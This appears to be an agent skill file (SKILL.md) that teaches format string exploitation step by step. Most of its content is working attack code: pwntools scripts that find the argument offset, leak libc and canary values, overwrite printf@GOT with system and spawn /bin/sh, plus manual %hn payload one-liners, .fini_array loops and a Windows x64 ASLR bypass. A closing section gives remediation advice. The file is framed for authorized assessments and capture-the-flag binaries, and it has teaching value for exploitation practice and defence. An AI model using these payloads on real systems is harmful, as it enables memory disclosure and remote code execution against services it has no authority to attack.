exploiting-format-string-vulnerabilities - SKILL.md Agent Skill

name: exploiting-format-string-vulnerabilities
description: Methodology for exploiting format string bugs where attacker-controlled data reaches the format argument of printf-family functions, enabling stack/memory disclosure (info leaks for ASLR/PIE/canary defeat) and arbitrary write primitives (%n) to hijack control flow via GOT/.fini_array overwrites.
domain: cybersecurity
subdomain: binary-exploitation
tags:
- binary-exploitation
- format-string
- exploit-development
version: '1.0'
author: xalgorix
license: Apache-2.0

Exploiting Format String Vulnerabilities

When to Use

During authorized binary/exploitation assessments when attacker input is passed as the first argument (the format) to printf, fprintf, sprintf, snprintf, vprintf, syslog, or similar.
When you need a memory-disclosure primitive to leak stack contents, a libc/PIE pointer, or a stack canary to defeat ASLR/PIE/canary protections.
When you have an arbitrary-write primitive opportunity via %n/%hn to overwrite a GOT entry, .fini_array, a saved return address, or a function pointer.
On Windows x64 services where a buggy _snprintf(dst, len, attacker_fmt) call passes no varargs: RCX, RDX, and R8 hold dst, len, and the format, so the first conversion reads whatever the caller left in R9 and later conversions read stale stack slots.

Critical: Concepts/Steps Most Often Missed

Put the format specifiers BEFORE the target address, not after. printf stops parsing the format at the first NUL byte. If you send p64(addr) + b"%7$s", the address (whose high bytes are NUL on 64-bit targets) terminates the string and the specifiers are never processed. Send b"%7$s" + padding + p64(addr) instead, and pad so the address lands in a pointer-aligned slot.
Use %hn (2 bytes), not %n (4 bytes), for full addresses. Writing a 4-byte value like 0x08049724 in one go means printing about 134 million characters. Split the write into two %hn operations (high and low halves) and emit the smaller half-value first, because the running output count only increases.
Confirm the offset precisely. Sending AAAA%p%p%p... is not enough; brute-force AAAA%N$p until the output shows 0x41414141 and verify with BBBB that you control a full aligned pointer slot. Off-by-one offset errors silently read the wrong slot.
%n writes are disabled by FORTIFY. With glibc, _FORTIFY_SOURCE=2 aborts when %n appears in a format string held in writable memory; on those targets you are limited to read primitives (still enough to leak a canary or libc pointer and pair with another bug).
Let pwntools do the math. fmtstr_payload() crafts the multi-write payload for a known offset, and FmtStr() can also find the offset automatically; manual HOB/LOB arithmetic is error-prone.
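The ordering rule in the first point can be checked without a target. The sketch below uses plain Python, with `struct.pack` standing in for pwntools' `p64`, to build the payload both ways and model what a NUL-terminated string reader sees. The helper names, the address 0x404020, and the assumption that the input buffer starts at argument 6 on a 64-bit target are illustrative, not taken from a real binary.

```python
import struct

def c_string_view(data: bytes) -> bytes:
    """Return the bytes a NUL-terminated string reader such as printf would parse."""
    return data.split(b"\x00", 1)[0]

def read_payload(buffer_offset: int, addr: int) -> bytes:
    """Place a %N$s specifier first and the 64-bit target address last.

    buffer_offset is the argument index where the start of our input lands
    (assumed known from probing). The specifier is padded to a multiple of
    8 bytes so the address occupies its own aligned argument slot.
    """
    for slots in range(1, 4):
        spec = f"%{buffer_offset + slots}$s".encode()
        if len(spec) <= slots * 8:
            break
    return spec.ljust(slots * 8, b"|") + struct.pack("<Q", addr)

addr = 0x404020                                  # hypothetical target address
wrong = struct.pack("<Q", addr) + b"%7$s"        # address first: specifier is cut off
right = read_payload(6, addr)                    # specifier first, address in slot 7

print(c_string_view(wrong))   # only the low address bytes survive
print(c_string_view(right))   # the specifier is parsed before the NUL bytes
```

Whether the bytes after a NUL even reach the buffer depends on how the target reads input (for example `read` versus `strcpy`), so this models only the parsing side.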

How to CONFIRM

A read primitive is confirmed when a chosen %N$p/%N$s returns attacker-known data: send b"AAAA%6$p" and confirm 0x41414141 (or 0x...41414141 on 64-bit, where the slot also holds the bytes that follow the marker) appears in the output; that proves your buffer is at stack arg 6. A write primitive is confirmed by reading back the target: overwrite a GOT entry with a sentinel, then dump it with %s/%p and verify the bytes changed, or set a breakpoint in gdb on the write target and observe the value land.

Workflow

Step 1: Confirm the Bug and Find the Argument Offset

from pwn import *
context.binary = elf = ELF('./chall', checksec=False)

# Brute-force the stack offset where our input lands
for i in range(1, 50):
    p = process('./chall')
    p.sendline(f"AAAA%{i}$p".encode())
    out = p.clean()
    p.close()
    # Match the hex digits only: 64-bit output looks like 0x...41414141
    if b"41414141" in out:
        log.success(f"Input is at offset {i}")
        break

A quick manual probe: if sending %p %p %p %p %p %p to a printf(buffer) call prints pointer-like values instead of the literal text, the input is being interpreted as a format string; seeing your own marker bytes among the leaked words shows where the buffer sits.
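When a single long `%p` chain is used instead of one process per offset, the argument index can be read from the dump. The following is a minimal sketch in plain Python; the function name and the sample dumps are made up for illustration, and it assumes the `%p` conversions were separated by a space or dot and that the C library prints null pointers as `(nil)`, as glibc does.

```python
import re

def find_offset(dump: bytes, marker: bytes = b"AAAA"):
    """Return the 1-based argument index whose low bytes equal the marker.

    The marker is compared little-endian against the trailing hex digits of
    each printed word, so 32-bit and 64-bit dumps are handled the same way.
    """
    want = marker[::-1].hex()
    words = re.findall(rb"0x[0-9a-fA-F]+|\(nil\)", dump)
    for index, word in enumerate(words, start=1):
        if word.startswith(b"0x") and word[2:].decode().lower().endswith(want):
            return index
    return None

# Hypothetical 64-bit dump: the marker shows up in the sixth printed word.
dump64 = (b"AAAA0x7ffe3b2a1c40 (nil) 0x7f1c2d114a37 0x1d "
          b"0x7f1c2d21ca70 0x2520702541414141 0x2070252070252070")
print(find_offset(dump64))
```

The index found this way is the `N` to use in `%N$p`; it is still worth re-checking with a second marker such as `BBBB` before building a write on top of it.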

Step 2: Build the Read Primitive (Leak Stack / libc / Canary)

# Read an arbitrary address: format specifier FIRST, address LAST (no early NUL)
payload  = b"%7$s"            # offset 7 holds our address slot
payload += b"|" * (8 - len(b"%7$s"))   # pad so the pointer is 8-aligned
payload += p64(0x404020)      # address to dereference and print as string
p.sendline(payload)
log.info(p.clean())

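# Leak a libc pointer from the stack (here a return address into __libc_start_main), then compute base
p.sendline(b"%25$p")
leak = int(p.recvline().strip(), 16)
libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
# The slot (25) and the +243 delta are specific to one libc build; verify both in gdb
libc.address = leak - libc.symbols['__libc_start_main'] - 243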
log.info("libc base @ %#x", libc.address)

Reads are useful to dump the binary from memory and to grab canaries, encryption keys, or hardcoded passwords stored on the stack/BSS.
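The base calculation is plain subtraction, and a page-alignment check catches most wrong guesses about the slot or the libc build. Here is a small sketch without pwntools; the function name is illustrative and every number in it (the leak, the `__libc_start_main` and `system` offsets, the +243 delta) is a hypothetical value for one libc build, not something to reuse as-is.

```python
PAGE_MASK = 0xFFF

def libc_base_from_leak(leak: int, symbol_offset: int, delta: int) -> int:
    """Subtract the known in-library position of the leaked pointer.

    symbol_offset is the symbol's offset inside libc and delta is how far
    past that symbol the leaked return address points.
    """
    base = leak - symbol_offset - delta
    if base & PAGE_MASK:
        raise ValueError(f"base {base:#x} is not page-aligned; wrong libc build or wrong slot")
    return base

# Hypothetical values for illustration only.
leak = int(b"0x7ffff7dc9083\n".strip(), 16)   # what a %25$p line might contain
LIBC_START_MAIN = 0x23F90                      # assumed offset of __libc_start_main
SYSTEM = 0x52290                               # assumed offset of system

base = libc_base_from_leak(leak, LIBC_START_MAIN, 243)
print(hex(base), hex(base + SYSTEM))
```

A base that fails the alignment check usually means the leaked slot is not the expected return address or the local libc does not match the target's.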

Step 3: Build the Write Primitive and Hijack Control Flow

# Let pwntools craft the multi-part write (byte-sized %hhn writes by default). Overwrite printf@GOT -> system
payload = fmtstr_payload(offset, {elf.got['printf'] : libc.sym['system']})
p.sendline(payload)
# Next call to printf(user_input) now runs system(user_input)
p.sendline(b'/bin/sh')
p.interactive()

Manual two-step %hn (when not using pwntools), writing high-order then low-order halves with %.<pad>x%<arg>$hn:

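# Example (32-bit): write the value 0xbffffc2f to address 0x08049724 as two 16-bit halves via args 4 and 5.
# 8 address bytes + 49143 = 0xbfff (high half, to 0x08049726); + 15408 more = 0xfc2f (low half, to 0x08049724).
python3 -c 'import sys; sys.stdout.buffer.write(b"\x26\x97\x04\x08\x24\x97\x04\x08%.49143x%4$hn%.15408x%5$hn\n")'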
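The padding numbers in that one-liner come from simple modular arithmetic on the running output count. The sketch below reproduces them in plain Python for a 32-bit target, using the same layout as the example (two addresses first, then a zero-padded `%x` and a positional `%hn` per half). The function name is illustrative, and it assumes each padding is at least 8 so that `%.Nx` prints exactly N characters.

```python
import struct

def two_hn_payload(target: int, value: int, first_arg: int) -> bytes:
    """Build a 32-bit payload that writes `value` to `target` with two %hn writes."""
    value &= 0xFFFFFFFF
    halves = [(target, value & 0xFFFF), (target + 2, value >> 16)]
    halves.sort(key=lambda item: item[1])            # smaller half-value first
    payload = b"".join(struct.pack("<I", addr) for addr, _ in halves)
    printed = len(payload)                           # the address bytes count as output
    for i, (_, half) in enumerate(halves):
        pad = (half - printed) % 0x10000             # %hn keeps only the low 16 bits
        if pad < 8:
            raise ValueError("padding too small for %.Nx; use a different filler")
        payload += f"%.{pad}x%{first_arg + i}$hn".encode()
        printed += pad
    return payload

# Same inputs as the manual example: value 0xbffffc2f, address 0x08049724, args 4 and 5.
print(two_hn_payload(0x08049724, 0xBFFFFC2F, 4))
```

Address-first ordering is safe here only because these 32-bit addresses contain no NUL bytes; on 64-bit targets the addresses go after the specifiers.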

Step 4: Make the Bug Reusable / Escalate

# If you need another pass through the vulnerable code, overwrite .fini_array
# to loop back to main, then perform the GOT overwrite on the second pass.
# send_payload, offset, padlen, and INIT_LOOP_ADDR are placeholders you must define.
fmt = FmtStr(execute_fmt=send_payload, offset=offset, padlen=padlen)
# __init_array_end typically coincides with the start of .fini_array; confirm with readelf -S
fmt.write(elf.symbols['__init_array_end'], INIT_LOOP_ADDR)  # loop back
fmt.write(elf.got['printf'], elf.plt['system'])             # then redirect
fmt.execute_writes()

On Windows x64, prepend %p to leak whatever pointer sits in R9 at the call-site, recover the module base as leak - known_offset, and reuse it to compute gadget/IAT addresses for a ROP chain.

Key Concepts

Concept	Description
Format specifier	`%x`/`%p` read stack words, `%s` dereferences a pointer and prints a string, `%n` writes the byte count to a pointed address.
Direct parameter access	`%N$x` selects the N-th argument directly (e.g. `%4$p` reads the 4th), avoiding long specifier chains.
Argument offset	The stack index at which attacker-controlled input appears; the anchor for both read and write primitives.
`%n` / `%hn` / `%hhn`	Write the number of bytes printed so far into an address: 4 bytes / 2 bytes / 1 byte respectively.
HOB / LOB	High-order and low-order 16-bit halves of the 32-bit value being written (often an address); written separately with two `%hn` operations.
GOT overwrite	Replacing a GOT entry (e.g. `printf`) with another function (e.g. `system`) so the next call is redirected.
`.fini_array` loop	Overwriting a destructor pointer to re-enter `main`, giving extra exploitation passes.
Width padding	`%<num>x` (field width) or `%.<num>x` (precision) makes one conversion print at least `num` characters, so `%n` can write a large value without a large input buffer.
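The `%n` and `%hn` rows can be observed safely on your own machine by calling the C library's `snprintf` through `ctypes`. This is a minimal sketch that assumes a Linux process whose C library is reachable via `ctypes.CDLL(None)` and is not built to reject `%n`; the function name is illustrative. It pads the output with a field width, then stores the running count once as an `int` and once as a 16-bit value.

```python
import ctypes

# Assumption: Linux with a libc (e.g. glibc) that exports snprintf.
libc = ctypes.CDLL(None)
libc.snprintf.restype = ctypes.c_int

def printed_count(pad: int):
    """Emit `pad` characters, then record the output count via %n and %hn."""
    buf = ctypes.create_string_buffer(pad + 16)
    as_int = ctypes.c_int(-1)
    as_short = ctypes.c_ushort(0xFFFF)
    fmt = f"%{pad}x%n%hn".encode()                 # width padding, then two writes
    libc.snprintf(buf, ctypes.c_size_t(len(buf)), fmt,
                  ctypes.c_uint(0), ctypes.byref(as_int), ctypes.byref(as_short))
    return as_int.value, as_short.value

print(printed_count(300))       # both writes see the same small count
print(printed_count(0x10001))   # %hn keeps only the low 16 bits of the count
```

The second call shows why half-writes wrap: after 0x10001 characters the `int` holds the full count while the 16-bit write holds 1, which is what makes writing a smaller half after a larger one possible at the cost of extra padding.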

Tools & Systems

Tool	Purpose
pwntools	`fmtstr_payload`, `FmtStr`, `ELF.got`/`ELF.plt`/`ELF.symbols`, process/remote IO, automated offset detection.
gdb + pwndbg/GEF	Inspect the stack at the `printf` call, confirm writes landed, set breakpoints on GOT targets.
checksec	Detect RELRO (full RELRO makes GOT read-only), FORTIFY (`%n` blocked), PIE, canary.
objdump / readelf	Enumerate GOT/PLT entries and `.fini_array`/`.init_array` addresses.
radare2 / Ghidra	Reverse the call-site to confirm the format argument is attacker-controlled and find static offsets (Windows base recovery).
one_gadget	After a libc leak, find a single-shot shell gadget to target with the write.

Common Scenarios

Scenario 1: Stack secret leak (no flow control needed)

printf(buffer) echoes user input. Brute-forcing %N$s finds a stack pointer at offset 10 that references a hardcoded password, or %N$p leaks a heap/libc address; either is enough to win without altering execution.

Scenario 2: GOT overwrite to system

A 32-bit no-RELRO binary calls printf(user) in a loop. fmtstr_payload(5, {got['printf']: libc.sym['system']}) redirects printf to system; the next iteration with input /bin/sh spawns a shell.

Scenario 3: ret2win via .fini_array + GOT

Against a binary that reaches the vulnerable printf only once, the first payload overwrites .fini_array to loop back to main; the second pass then writes the win/system address into a GOT slot that is called right after.

Scenario 4: Windows x64 ASLR defeat

A service does _snprintf(dst, 0xff2, keyData) with no varargs. A leading %p prints the value in R9 — a stable in-module pointer — letting the attacker compute the image base and bootstrap a ROP chain.

Output Format

## Format String Finding

**Vulnerability**: Uncontrolled format string (CWE-134)
**Severity**: Critical (arbitrary read+write -> RCE) / High (info leak only)
**Binary**: ./chall (x86-64, Partial RELRO, No PIE, No FORTIFY)
**Call site**: printf(user_input) in handle_request()

### Primitive Confirmation
- Read: input at stack offset 6 (AAAA%6$p -> 0x...41414141)
- Leak: libc base @ 0x7ffff7da5000 via %25$p
- Write: %hn enabled (no FORTIFY), Partial RELRO -> GOT writable

### Exploitation
fmtstr_payload(6, {got['printf']: libc.sym['system']})
Result: printf("/bin/sh") executed system("/bin/sh") -> shell as service user.

### Impact
Arbitrary memory read/write leading to remote code execution.

### Recommendation
1. Never pass user input as the format argument: use printf("%s", user_input).
2. Compile with -Wformat -Wformat-security -Werror=format-security and -D_FORTIFY_SOURCE=2 (which needs optimization enabled, e.g. -O2).
3. Enable Full RELRO (-Wl,-z,relro,-z,now) to make the GOT read-only.
4. Enable PIE/ASLR and stack canaries.